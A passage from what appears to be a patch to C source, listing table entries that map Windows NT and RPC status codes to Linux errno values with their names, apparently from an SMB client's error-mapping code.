+-	{STATUS_MFT_TOO_FRAGMENTED, -EIO, "STATUS_MFT_TOO_FRAGMENTED"},
+-	{STATUS_COPY_PROTECTION_FAILURE, -EIO,
+-	"STATUS_COPY_PROTECTION_FAILURE"},
+-	{STATUS_CSS_AUTHENTICATION_FAILURE, -EIO,
+-	"STATUS_CSS_AUTHENTICATION_FAILURE"},
+-	{STATUS_CSS_KEY_NOT_PRESENT, -EIO, "STATUS_CSS_KEY_NOT_PRESENT"},
+-	{STATUS_CSS_KEY_NOT_ESTABLISHED, -EIO,
+-	"STATUS_CSS_KEY_NOT_ESTABLISHED"},
+-	{STATUS_CSS_SCRAMBLED_SECTOR, -EIO, "STATUS_CSS_SCRAMBLED_SECTOR"},
+-	{STATUS_CSS_REGION_MISMATCH, -EIO, "STATUS_CSS_REGION_MISMATCH"},
+-	{STATUS_CSS_RESETS_EXHAUSTED, -EIO, "STATUS_CSS_RESETS_EXHAUSTED"},
+-	{STATUS_PKINIT_FAILURE, -EIO, "STATUS_PKINIT_FAILURE"},
+-	{STATUS_SMARTCARD_SUBSYSTEM_FAILURE, -EIO,
+-	"STATUS_SMARTCARD_SUBSYSTEM_FAILURE"},
+-	{STATUS_NO_KERB_KEY, -EIO, "STATUS_NO_KERB_KEY"},
+-	{STATUS_HOST_DOWN, -EIO, "STATUS_HOST_DOWN"},
+-	{STATUS_UNSUPPORTED_PREAUTH, -EIO, "STATUS_UNSUPPORTED_PREAUTH"},
+-	{STATUS_EFS_ALG_BLOB_TOO_BIG, -EIO, "STATUS_EFS_ALG_BLOB_TOO_BIG"},
+-	{STATUS_PORT_NOT_SET, -EIO, "STATUS_PORT_NOT_SET"},
+-	{STATUS_DEBUGGER_INACTIVE, -EIO, "STATUS_DEBUGGER_INACTIVE"},
+-	{STATUS_DS_VERSION_CHECK_FAILURE, -EIO,
+-	"STATUS_DS_VERSION_CHECK_FAILURE"},
+-	{STATUS_AUDITING_DISABLED, -EIO, "STATUS_AUDITING_DISABLED"},
+-	{STATUS_PRENT4_MACHINE_ACCOUNT, -EIO, "STATUS_PRENT4_MACHINE_ACCOUNT"},
+-	{STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER, -EIO,
+-	"STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER"},
+-	{STATUS_INVALID_IMAGE_WIN_32, -EIO, "STATUS_INVALID_IMAGE_WIN_32"},
+-	{STATUS_INVALID_IMAGE_WIN_64, -EIO, "STATUS_INVALID_IMAGE_WIN_64"},
+-	{STATUS_BAD_BINDINGS, -EIO, "STATUS_BAD_BINDINGS"},
+-	{STATUS_NETWORK_SESSION_EXPIRED, -EIO,
+-	"STATUS_NETWORK_SESSION_EXPIRED"},
+-	{STATUS_APPHELP_BLOCK, -EIO, "STATUS_APPHELP_BLOCK"},
+-	{STATUS_ALL_SIDS_FILTERED, -EIO, "STATUS_ALL_SIDS_FILTERED"},
+-	{STATUS_NOT_SAFE_MODE_DRIVER, -EIO, "STATUS_NOT_SAFE_MODE_DRIVER"},
+-	{STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT, -EACCES,
+-	"STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT"},
+-	{STATUS_ACCESS_DISABLED_BY_POLICY_PATH, -EACCES,
+-	"STATUS_ACCESS_DISABLED_BY_POLICY_PATH"},
+-	{STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER, -EACCES,
+-	"STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER"},
+-	{STATUS_ACCESS_DISABLED_BY_POLICY_OTHER, -EACCES,
+-	"STATUS_ACCESS_DISABLED_BY_POLICY_OTHER"},
+-	{STATUS_FAILED_DRIVER_ENTRY, -EIO, "STATUS_FAILED_DRIVER_ENTRY"},
+-	{STATUS_DEVICE_ENUMERATION_ERROR, -EIO,
+-	"STATUS_DEVICE_ENUMERATION_ERROR"},
+-	{STATUS_MOUNT_POINT_NOT_RESOLVED, -EIO,
+-	"STATUS_MOUNT_POINT_NOT_RESOLVED"},
+-	{STATUS_INVALID_DEVICE_OBJECT_PARAMETER, -EIO,
+-	"STATUS_INVALID_DEVICE_OBJECT_PARAMETER"},
+-	{STATUS_MCA_OCCURED, -EIO, "STATUS_MCA_OCCURED"},
+-	{STATUS_DRIVER_BLOCKED_CRITICAL, -EIO,
+-	"STATUS_DRIVER_BLOCKED_CRITICAL"},
+-	{STATUS_DRIVER_BLOCKED, -EIO, "STATUS_DRIVER_BLOCKED"},
+-	{STATUS_DRIVER_DATABASE_ERROR, -EIO, "STATUS_DRIVER_DATABASE_ERROR"},
+-	{STATUS_SYSTEM_HIVE_TOO_LARGE, -EIO, "STATUS_SYSTEM_HIVE_TOO_LARGE"},
+-	{STATUS_INVALID_IMPORT_OF_NON_DLL, -EIO,
+-	"STATUS_INVALID_IMPORT_OF_NON_DLL"},
+-	{STATUS_NO_SECRETS, -EIO, "STATUS_NO_SECRETS"},
+-	{STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY, -EACCES,
+-	"STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY"},
+-	{STATUS_FAILED_STACK_SWITCH, -EIO, "STATUS_FAILED_STACK_SWITCH"},
+-	{STATUS_HEAP_CORRUPTION, -EIO, "STATUS_HEAP_CORRUPTION"},
+-	{STATUS_SMARTCARD_WRONG_PIN, -EIO, "STATUS_SMARTCARD_WRONG_PIN"},
+-	{STATUS_SMARTCARD_CARD_BLOCKED, -EIO, "STATUS_SMARTCARD_CARD_BLOCKED"},
+-	{STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED, -EIO,
+-	"STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED"},
+-	{STATUS_SMARTCARD_NO_CARD, -EIO, "STATUS_SMARTCARD_NO_CARD"},
+-	{STATUS_SMARTCARD_NO_KEY_CONTAINER, -EIO,
+-	"STATUS_SMARTCARD_NO_KEY_CONTAINER"},
+-	{STATUS_SMARTCARD_NO_CERTIFICATE, -EIO,
+-	"STATUS_SMARTCARD_NO_CERTIFICATE"},
+-	{STATUS_SMARTCARD_NO_KEYSET, -EIO, "STATUS_SMARTCARD_NO_KEYSET"},
+-	{STATUS_SMARTCARD_IO_ERROR, -EIO, "STATUS_SMARTCARD_IO_ERROR"},
+-	{STATUS_DOWNGRADE_DETECTED, -EIO, "STATUS_DOWNGRADE_DETECTED"},
+-	{STATUS_SMARTCARD_CERT_REVOKED, -EIO, "STATUS_SMARTCARD_CERT_REVOKED"},
+-	{STATUS_ISSUING_CA_UNTRUSTED, -EIO, "STATUS_ISSUING_CA_UNTRUSTED"},
+-	{STATUS_REVOCATION_OFFLINE_C, -EIO, "STATUS_REVOCATION_OFFLINE_C"},
+-	{STATUS_PKINIT_CLIENT_FAILURE, -EIO, "STATUS_PKINIT_CLIENT_FAILURE"},
+-	{STATUS_SMARTCARD_CERT_EXPIRED, -EIO, "STATUS_SMARTCARD_CERT_EXPIRED"},
+-	{STATUS_DRIVER_FAILED_PRIOR_UNLOAD, -EIO,
+-	"STATUS_DRIVER_FAILED_PRIOR_UNLOAD"},
+-	{STATUS_SMARTCARD_SILENT_CONTEXT, -EIO,
+-	"STATUS_SMARTCARD_SILENT_CONTEXT"},
+-	{STATUS_PER_USER_TRUST_QUOTA_EXCEEDED, -EDQUOT,
+-	"STATUS_PER_USER_TRUST_QUOTA_EXCEEDED"},
+-	{STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED, -EDQUOT,
+-	"STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED"},
+-	{STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED, -EDQUOT,
+-	"STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED"},
+-	{STATUS_DS_NAME_NOT_UNIQUE, -EIO, "STATUS_DS_NAME_NOT_UNIQUE"},
+-	{STATUS_DS_DUPLICATE_ID_FOUND, -EIO, "STATUS_DS_DUPLICATE_ID_FOUND"},
+-	{STATUS_DS_GROUP_CONVERSION_ERROR, -EIO,
+-	"STATUS_DS_GROUP_CONVERSION_ERROR"},
+-	{STATUS_VOLSNAP_PREPARE_HIBERNATE, -EIO,
+-	"STATUS_VOLSNAP_PREPARE_HIBERNATE"},
+-	{STATUS_USER2USER_REQUIRED, -EIO, "STATUS_USER2USER_REQUIRED"},
+-	{STATUS_STACK_BUFFER_OVERRUN, -EIO, "STATUS_STACK_BUFFER_OVERRUN"},
+-	{STATUS_NO_S4U_PROT_SUPPORT, -EIO, "STATUS_NO_S4U_PROT_SUPPORT"},
+-	{STATUS_CROSSREALM_DELEGATION_FAILURE, -EIO,
+-	"STATUS_CROSSREALM_DELEGATION_FAILURE"},
+-	{STATUS_REVOCATION_OFFLINE_KDC, -EIO, "STATUS_REVOCATION_OFFLINE_KDC"},
+-	{STATUS_ISSUING_CA_UNTRUSTED_KDC, -EIO,
+-	"STATUS_ISSUING_CA_UNTRUSTED_KDC"},
+-	{STATUS_KDC_CERT_EXPIRED, -EIO, "STATUS_KDC_CERT_EXPIRED"},
+-	{STATUS_KDC_CERT_REVOKED, -EIO, "STATUS_KDC_CERT_REVOKED"},
+-	{STATUS_PARAMETER_QUOTA_EXCEEDED, -EDQUOT,
+-	"STATUS_PARAMETER_QUOTA_EXCEEDED"},
+-	{STATUS_HIBERNATION_FAILURE, -EIO, "STATUS_HIBERNATION_FAILURE"},
+-	{STATUS_DELAY_LOAD_FAILED, -EIO, "STATUS_DELAY_LOAD_FAILED"},
+-	{STATUS_AUTHENTICATION_FIREWALL_FAILED, -EIO,
+-	"STATUS_AUTHENTICATION_FIREWALL_FAILED"},
+-	{STATUS_VDM_DISALLOWED, -EIO, "STATUS_VDM_DISALLOWED"},
+-	{STATUS_HUNG_DISPLAY_DRIVER_THREAD, -EIO,
+-	"STATUS_HUNG_DISPLAY_DRIVER_THREAD"},
+-	{STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE, -EIO,
+-	"STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE"},
+-	{STATUS_INVALID_CRUNTIME_PARAMETER, -EIO,
+-	"STATUS_INVALID_CRUNTIME_PARAMETER"},
+-	{STATUS_NTLM_BLOCKED, -EIO, "STATUS_NTLM_BLOCKED"},
+-	{STATUS_ASSERTION_FAILURE, -EIO, "STATUS_ASSERTION_FAILURE"},
+-	{STATUS_VERIFIER_STOP, -EIO, "STATUS_VERIFIER_STOP"},
+-	{STATUS_CALLBACK_POP_STACK, -EIO, "STATUS_CALLBACK_POP_STACK"},
+-	{STATUS_INCOMPATIBLE_DRIVER_BLOCKED, -EIO,
+-	"STATUS_INCOMPATIBLE_DRIVER_BLOCKED"},
+-	{STATUS_HIVE_UNLOADED, -EIO, "STATUS_HIVE_UNLOADED"},
+-	{STATUS_COMPRESSION_DISABLED, -EIO, "STATUS_COMPRESSION_DISABLED"},
+-	{STATUS_FILE_SYSTEM_LIMITATION, -EIO, "STATUS_FILE_SYSTEM_LIMITATION"},
+-	{STATUS_INVALID_IMAGE_HASH, -EIO, "STATUS_INVALID_IMAGE_HASH"},
+-	{STATUS_NOT_CAPABLE, -EIO, "STATUS_NOT_CAPABLE"},
+-	{STATUS_REQUEST_OUT_OF_SEQUENCE, -EIO,
+-	"STATUS_REQUEST_OUT_OF_SEQUENCE"},
+-	{STATUS_IMPLEMENTATION_LIMIT, -EIO, "STATUS_IMPLEMENTATION_LIMIT"},
+-	{STATUS_ELEVATION_REQUIRED, -EIO, "STATUS_ELEVATION_REQUIRED"},
+-	{STATUS_BEYOND_VDL, -EIO, "STATUS_BEYOND_VDL"},
+-	{STATUS_ENCOUNTERED_WRITE_IN_PROGRESS, -EIO,
+-	"STATUS_ENCOUNTERED_WRITE_IN_PROGRESS"},
+-	{STATUS_PTE_CHANGED, -EIO, "STATUS_PTE_CHANGED"},
+-	{STATUS_PURGE_FAILED, -EIO, "STATUS_PURGE_FAILED"},
+-	{STATUS_CRED_REQUIRES_CONFIRMATION, -EIO,
+-	"STATUS_CRED_REQUIRES_CONFIRMATION"},
+-	{STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE, -EIO,
+-	"STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE"},
+-	{STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER, -EIO,
+-	"STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER"},
+-	{STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE, -EIO,
+-	"STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE"},
+-	{STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE, -EIO,
+-	"STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE"},
+-	{STATUS_CS_ENCRYPTION_FILE_NOT_CSE, -EIO,
+-	"STATUS_CS_ENCRYPTION_FILE_NOT_CSE"},
+-	{STATUS_INVALID_LABEL, -EIO, "STATUS_INVALID_LABEL"},
+-	{STATUS_DRIVER_PROCESS_TERMINATED, -EIO,
+-	"STATUS_DRIVER_PROCESS_TERMINATED"},
+-	{STATUS_AMBIGUOUS_SYSTEM_DEVICE, -EIO,
+-	"STATUS_AMBIGUOUS_SYSTEM_DEVICE"},
+-	{STATUS_SYSTEM_DEVICE_NOT_FOUND, -EIO,
+-	"STATUS_SYSTEM_DEVICE_NOT_FOUND"},
+-	{STATUS_RESTART_BOOT_APPLICATION, -EIO,
+-	"STATUS_RESTART_BOOT_APPLICATION"},
+-	{STATUS_INVALID_TASK_NAME, -EIO, "STATUS_INVALID_TASK_NAME"},
+-	{STATUS_INVALID_TASK_INDEX, -EIO, "STATUS_INVALID_TASK_INDEX"},
+-	{STATUS_THREAD_ALREADY_IN_TASK, -EIO, "STATUS_THREAD_ALREADY_IN_TASK"},
+-	{STATUS_CALLBACK_BYPASS, -EIO, "STATUS_CALLBACK_BYPASS"},
+-	{STATUS_PORT_CLOSED, -EIO, "STATUS_PORT_CLOSED"},
+-	{STATUS_MESSAGE_LOST, -EIO, "STATUS_MESSAGE_LOST"},
+-	{STATUS_INVALID_MESSAGE, -EIO, "STATUS_INVALID_MESSAGE"},
+-	{STATUS_REQUEST_CANCELED, -EIO, "STATUS_REQUEST_CANCELED"},
+-	{STATUS_RECURSIVE_DISPATCH, -EIO, "STATUS_RECURSIVE_DISPATCH"},
+-	{STATUS_LPC_RECEIVE_BUFFER_EXPECTED, -EIO,
+-	"STATUS_LPC_RECEIVE_BUFFER_EXPECTED"},
+-	{STATUS_LPC_INVALID_CONNECTION_USAGE, -EIO,
+-	"STATUS_LPC_INVALID_CONNECTION_USAGE"},
+-	{STATUS_LPC_REQUESTS_NOT_ALLOWED, -EIO,
+-	"STATUS_LPC_REQUESTS_NOT_ALLOWED"},
+-	{STATUS_RESOURCE_IN_USE, -EIO, "STATUS_RESOURCE_IN_USE"},
+-	{STATUS_HARDWARE_MEMORY_ERROR, -EIO, "STATUS_HARDWARE_MEMORY_ERROR"},
+-	{STATUS_THREADPOOL_HANDLE_EXCEPTION, -EIO,
+-	"STATUS_THREADPOOL_HANDLE_EXCEPTION"},
+-	{STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED, -EIO,
+-	"STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED"},
+-	{STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED, -EIO,
+-	"STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED"},
+-	{STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED, -EIO,
+-	"STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED"},
+-	{STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED, -EIO,
+-	"STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED"},
+-	{STATUS_THREADPOOL_RELEASED_DURING_OPERATION, -EIO,
+-	"STATUS_THREADPOOL_RELEASED_DURING_OPERATION"},
+-	{STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING, -EIO,
+-	"STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING"},
+-	{STATUS_APC_RETURNED_WHILE_IMPERSONATING, -EIO,
+-	"STATUS_APC_RETURNED_WHILE_IMPERSONATING"},
+-	{STATUS_PROCESS_IS_PROTECTED, -EIO, "STATUS_PROCESS_IS_PROTECTED"},
+-	{STATUS_MCA_EXCEPTION, -EIO, "STATUS_MCA_EXCEPTION"},
+-	{STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE, -EIO,
+-	"STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE"},
+-	{STATUS_SYMLINK_CLASS_DISABLED, -EIO, "STATUS_SYMLINK_CLASS_DISABLED"},
+-	{STATUS_INVALID_IDN_NORMALIZATION, -EIO,
+-	"STATUS_INVALID_IDN_NORMALIZATION"},
+-	{STATUS_NO_UNICODE_TRANSLATION, -EIO, "STATUS_NO_UNICODE_TRANSLATION"},
+-	{STATUS_ALREADY_REGISTERED, -EIO, "STATUS_ALREADY_REGISTERED"},
+-	{STATUS_CONTEXT_MISMATCH, -EIO, "STATUS_CONTEXT_MISMATCH"},
+-	{STATUS_PORT_ALREADY_HAS_COMPLETION_LIST, -EIO,
+-	"STATUS_PORT_ALREADY_HAS_COMPLETION_LIST"},
+-	{STATUS_CALLBACK_RETURNED_THREAD_PRIORITY, -EIO,
+-	"STATUS_CALLBACK_RETURNED_THREAD_PRIORITY"},
+-	{STATUS_INVALID_THREAD, -EIO, "STATUS_INVALID_THREAD"},
+-	{STATUS_CALLBACK_RETURNED_TRANSACTION, -EIO,
+-	"STATUS_CALLBACK_RETURNED_TRANSACTION"},
+-	{STATUS_CALLBACK_RETURNED_LDR_LOCK, -EIO,
+-	"STATUS_CALLBACK_RETURNED_LDR_LOCK"},
+-	{STATUS_CALLBACK_RETURNED_LANG, -EIO, "STATUS_CALLBACK_RETURNED_LANG"},
+-	{STATUS_CALLBACK_RETURNED_PRI_BACK, -EIO,
+-	"STATUS_CALLBACK_RETURNED_PRI_BACK"},
+-	{STATUS_CALLBACK_RETURNED_THREAD_AFFINITY, -EIO,
+-	"STATUS_CALLBACK_RETURNED_THREAD_AFFINITY"},
+-	{STATUS_DISK_REPAIR_DISABLED, -EIO, "STATUS_DISK_REPAIR_DISABLED"},
+-	{STATUS_DS_DOMAIN_RENAME_IN_PROGRESS, -EIO,
+-	"STATUS_DS_DOMAIN_RENAME_IN_PROGRESS"},
+-	{STATUS_DISK_QUOTA_EXCEEDED, -EDQUOT, "STATUS_DISK_QUOTA_EXCEEDED"},
+-	{STATUS_CONTENT_BLOCKED, -EIO, "STATUS_CONTENT_BLOCKED"},
+-	{STATUS_BAD_CLUSTERS, -EIO, "STATUS_BAD_CLUSTERS"},
+-	{STATUS_VOLUME_DIRTY, -EIO, "STATUS_VOLUME_DIRTY"},
+-	{STATUS_FILE_CHECKED_OUT, -EIO, "STATUS_FILE_CHECKED_OUT"},
+-	{STATUS_CHECKOUT_REQUIRED, -EIO, "STATUS_CHECKOUT_REQUIRED"},
+-	{STATUS_BAD_FILE_TYPE, -EIO, "STATUS_BAD_FILE_TYPE"},
+-	{STATUS_FILE_TOO_LARGE, -EIO, "STATUS_FILE_TOO_LARGE"},
+-	{STATUS_FORMS_AUTH_REQUIRED, -EIO, "STATUS_FORMS_AUTH_REQUIRED"},
+-	{STATUS_VIRUS_INFECTED, -EIO, "STATUS_VIRUS_INFECTED"},
+-	{STATUS_VIRUS_DELETED, -EIO, "STATUS_VIRUS_DELETED"},
+-	{STATUS_BAD_MCFG_TABLE, -EIO, "STATUS_BAD_MCFG_TABLE"},
+-	{STATUS_WOW_ASSERTION, -EIO, "STATUS_WOW_ASSERTION"},
+-	{STATUS_INVALID_SIGNATURE, -EIO, "STATUS_INVALID_SIGNATURE"},
+-	{STATUS_HMAC_NOT_SUPPORTED, -EIO, "STATUS_HMAC_NOT_SUPPORTED"},
+-	{STATUS_IPSEC_QUEUE_OVERFLOW, -EIO, "STATUS_IPSEC_QUEUE_OVERFLOW"},
+-	{STATUS_ND_QUEUE_OVERFLOW, -EIO, "STATUS_ND_QUEUE_OVERFLOW"},
+-	{STATUS_HOPLIMIT_EXCEEDED, -EIO, "STATUS_HOPLIMIT_EXCEEDED"},
+-	{STATUS_PROTOCOL_NOT_SUPPORTED, -EOPNOTSUPP,
+-	"STATUS_PROTOCOL_NOT_SUPPORTED"},
+-	{STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED, -EIO,
+-	"STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED"},
+-	{STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR, -EIO,
+-	"STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR"},
+-	{STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR, -EIO,
+-	"STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR"},
+-	{STATUS_XML_PARSE_ERROR, -EIO, "STATUS_XML_PARSE_ERROR"},
+-	{STATUS_XMLDSIG_ERROR, -EIO, "STATUS_XMLDSIG_ERROR"},
+-	{STATUS_WRONG_COMPARTMENT, -EIO, "STATUS_WRONG_COMPARTMENT"},
+-	{STATUS_AUTHIP_FAILURE, -EIO, "STATUS_AUTHIP_FAILURE"},
+-	{DBG_NO_STATE_CHANGE, -EIO, "DBG_NO_STATE_CHANGE"},
+-	{DBG_APP_NOT_IDLE, -EIO, "DBG_APP_NOT_IDLE"},
+-	{RPC_NT_INVALID_STRING_BINDING, -EIO, "RPC_NT_INVALID_STRING_BINDING"},
+-	{RPC_NT_WRONG_KIND_OF_BINDING, -EIO, "RPC_NT_WRONG_KIND_OF_BINDING"},
+-	{RPC_NT_INVALID_BINDING, -EIO, "RPC_NT_INVALID_BINDING"},
+-	{RPC_NT_PROTSEQ_NOT_SUPPORTED, -EOPNOTSUPP,
+-	"RPC_NT_PROTSEQ_NOT_SUPPORTED"},
+-	{RPC_NT_INVALID_RPC_PROTSEQ, -EIO, "RPC_NT_INVALID_RPC_PROTSEQ"},
+-	{RPC_NT_INVALID_STRING_UUID, -EIO, "RPC_NT_INVALID_STRING_UUID"},
+-	{RPC_NT_INVALID_ENDPOINT_FORMAT, -EIO,
+-	"RPC_NT_INVALID_ENDPOINT_FORMAT"},
+-	{RPC_NT_INVALID_NET_ADDR, -EIO, "RPC_NT_INVALID_NET_ADDR"},
+-	{RPC_NT_NO_ENDPOINT_FOUND, -EIO, "RPC_NT_NO_ENDPOINT_FOUND"},
+-	{RPC_NT_INVALID_TIMEOUT, -EINVAL, "RPC_NT_INVALID_TIMEOUT"},
+-	{RPC_NT_OBJECT_NOT_FOUND, -ENOENT, "RPC_NT_OBJECT_NOT_FOUND"},
+-	{RPC_NT_ALREADY_REGISTERED, -EIO, "RPC_NT_ALREADY_REGISTERED"},
+-	{RPC_NT_TYPE_ALREADY_REGISTERED, -EIO,
+-	"RPC_NT_TYPE_ALREADY_REGISTERED"},
+-	{RPC_NT_ALREADY_LISTENING, -EIO, "RPC_NT_ALREADY_LISTENING"},
+-	{RPC_NT_NO_PROTSEQS_REGISTERED, -EIO, "RPC_NT_NO_PROTSEQS_REGISTERED"},
+-	{RPC_NT_NOT_LISTENING, -EIO, "RPC_NT_NOT_LISTENING"},
+-	{RPC_NT_UNKNOWN_MGR_TYPE, -EIO, "RPC_NT_UNKNOWN_MGR_TYPE"},
+-	{RPC_NT_UNKNOWN_IF, -EIO, "RPC_NT_UNKNOWN_IF"},
+-	{RPC_NT_NO_BINDINGS, -EIO, "RPC_NT_NO_BINDINGS"},
+-	{RPC_NT_NO_PROTSEQS, -EIO, "RPC_NT_NO_PROTSEQS"},
+-	{RPC_NT_CANT_CREATE_ENDPOINT, -EIO, "RPC_NT_CANT_CREATE_ENDPOINT"},
+-	{RPC_NT_OUT_OF_RESOURCES, -EIO, "RPC_NT_OUT_OF_RESOURCES"},
+-	{RPC_NT_SERVER_UNAVAILABLE, -EIO, "RPC_NT_SERVER_UNAVAILABLE"},
+-	{RPC_NT_SERVER_TOO_BUSY, -EBUSY, "RPC_NT_SERVER_TOO_BUSY"},
+-	{RPC_NT_INVALID_NETWORK_OPTIONS, -EIO,
+-	"RPC_NT_INVALID_NETWORK_OPTIONS"},
+-	{RPC_NT_NO_CALL_ACTIVE, -EIO, "RPC_NT_NO_CALL_ACTIVE"},
+-	{RPC_NT_CALL_FAILED, -EIO, "RPC_NT_CALL_FAILED"},
+-	{RPC_NT_CALL_FAILED_DNE, -EIO, "RPC_NT_CALL_FAILED_DNE"},
+-	{RPC_NT_PROTOCOL_ERROR, -EIO, "RPC_NT_PROTOCOL_ERROR"},
+-	{RPC_NT_UNSUPPORTED_TRANS_SYN, -EIO, "RPC_NT_UNSUPPORTED_TRANS_SYN"},
+-	{RPC_NT_UNSUPPORTED_TYPE, -EIO, "RPC_NT_UNSUPPORTED_TYPE"},
+-	{RPC_NT_INVALID_TAG, -EIO, "RPC_NT_INVALID_TAG"},
+-	{RPC_NT_INVALID_BOUND, -EIO, "RPC_NT_INVALID_BOUND"},
+-	{RPC_NT_NO_ENTRY_NAME, -EIO, "RPC_NT_NO_ENTRY_NAME"},
+-	{RPC_NT_INVALID_NAME_SYNTAX, -EIO, "RPC_NT_INVALID_NAME_SYNTAX"},
+-	{RPC_NT_UNSUPPORTED_NAME_SYNTAX, -EIO,
+-	"RPC_NT_UNSUPPORTED_NAME_SYNTAX"},
+-	{RPC_NT_UUID_NO_ADDRESS, -EIO, "RPC_NT_UUID_NO_ADDRESS"},
+-	{RPC_NT_DUPLICATE_ENDPOINT, -ENOTUNIQ, "RPC_NT_DUPLICATE_ENDPOINT"},
+-	{RPC_NT_UNKNOWN_AUTHN_TYPE, -EIO, "RPC_NT_UNKNOWN_AUTHN_TYPE"},
+-	{RPC_NT_MAX_CALLS_TOO_SMALL, -EIO, "RPC_NT_MAX_CALLS_TOO_SMALL"},
+-	{RPC_NT_STRING_TOO_LONG, -EIO, "RPC_NT_STRING_TOO_LONG"},
+-	{RPC_NT_PROTSEQ_NOT_FOUND, -EIO, "RPC_NT_PROTSEQ_NOT_FOUND"},
+-	{RPC_NT_PROCNUM_OUT_OF_RANGE, -EIO, "RPC_NT_PROCNUM_OUT_OF_RANGE"},
+-	{RPC_NT_BINDING_HAS_NO_AUTH, -EIO, "RPC_NT_BINDING_HAS_NO_AUTH"},
+-	{RPC_NT_UNKNOWN_AUTHN_SERVICE, -EIO, "RPC_NT_UNKNOWN_AUTHN_SERVICE"},
+-	{RPC_NT_UNKNOWN_AUTHN_LEVEL, -EIO, "RPC_NT_UNKNOWN_AUTHN_LEVEL"},
+-	{RPC_NT_INVALID_AUTH_IDENTITY, -EIO, "RPC_NT_INVALID_AUTH_IDENTITY"},
+-	{RPC_NT_UNKNOWN_AUTHZ_SERVICE, -EIO, "RPC_NT_UNKNOWN_AUTHZ_SERVICE"},
+-	{EPT_NT_INVALID_ENTRY, -EIO, "EPT_NT_INVALID_ENTRY"},
+-	{EPT_NT_CANT_PERFORM_OP, -EIO, "EPT_NT_CANT_PERFORM_OP"},
+-	{EPT_NT_NOT_REGISTERED, -EIO, "EPT_NT_NOT_REGISTERED"},
+-	{RPC_NT_NOTHING_TO_EXPORT, -EIO, "RPC_NT_NOTHING_TO_EXPORT"},
+-	{RPC_NT_INCOMPLETE_NAME, -EIO, "RPC_NT_INCOMPLETE_NAME"},
+-	{RPC_NT_INVALID_VERS_OPTION, -EIO, "RPC_NT_INVALID_VERS_OPTION"},
+-	{RPC_NT_NO_MORE_MEMBERS, -EIO, "RPC_NT_NO_MORE_MEMBERS"},
+-	{RPC_NT_NOT_ALL_OBJS_UNEXPORTED, -EIO,
+-	"RPC_NT_NOT_ALL_OBJS_UNEXPORTED"},
+-	{RPC_NT_INTERFACE_NOT_FOUND, -EIO, "RPC_NT_INTERFACE_NOT_FOUND"},
+-	{RPC_NT_ENTRY_ALREADY_EXISTS, -EIO, "RPC_NT_ENTRY_ALREADY_EXISTS"},
+-	{RPC_NT_ENTRY_NOT_FOUND, -EIO, "RPC_NT_ENTRY_NOT_FOUND"},
+-	{RPC_NT_NAME_SERVICE_UNAVAILABLE, -EIO,
+-	"RPC_NT_NAME_SERVICE_UNAVAILABLE"},
+-	{RPC_NT_INVALID_NAF_ID, -EIO, "RPC_NT_INVALID_NAF_ID"},
+-	{RPC_NT_CANNOT_SUPPORT, -EOPNOTSUPP, "RPC_NT_CANNOT_SUPPORT"},
+-	{RPC_NT_NO_CONTEXT_AVAILABLE, -EIO, "RPC_NT_NO_CONTEXT_AVAILABLE"},
+-	{RPC_NT_INTERNAL_ERROR, -EIO, "RPC_NT_INTERNAL_ERROR"},
+-	{RPC_NT_ZERO_DIVIDE, -EIO, "RPC_NT_ZERO_DIVIDE"},
+-	{RPC_NT_ADDRESS_ERROR, -EIO, "RPC_NT_ADDRESS_ERROR"},
+-	{RPC_NT_FP_DIV_ZERO, -EIO, "RPC_NT_FP_DIV_ZERO"},
+-	{RPC_NT_FP_UNDERFLOW, -EIO, "RPC_NT_FP_UNDERFLOW"},
+-	{RPC_NT_FP_OVERFLOW, -EIO, "RPC_NT_FP_OVERFLOW"},
+-	{RPC_NT_CALL_IN_PROGRESS, -EIO, "RPC_NT_CALL_IN_PROGRESS"},
+-	{RPC_NT_NO_MORE_BINDINGS, -EIO, "RPC_NT_NO_MORE_BINDINGS"},
+-	{RPC_NT_GROUP_MEMBER_NOT_FOUND, -EIO, "RPC_NT_GROUP_MEMBER_NOT_FOUND"},
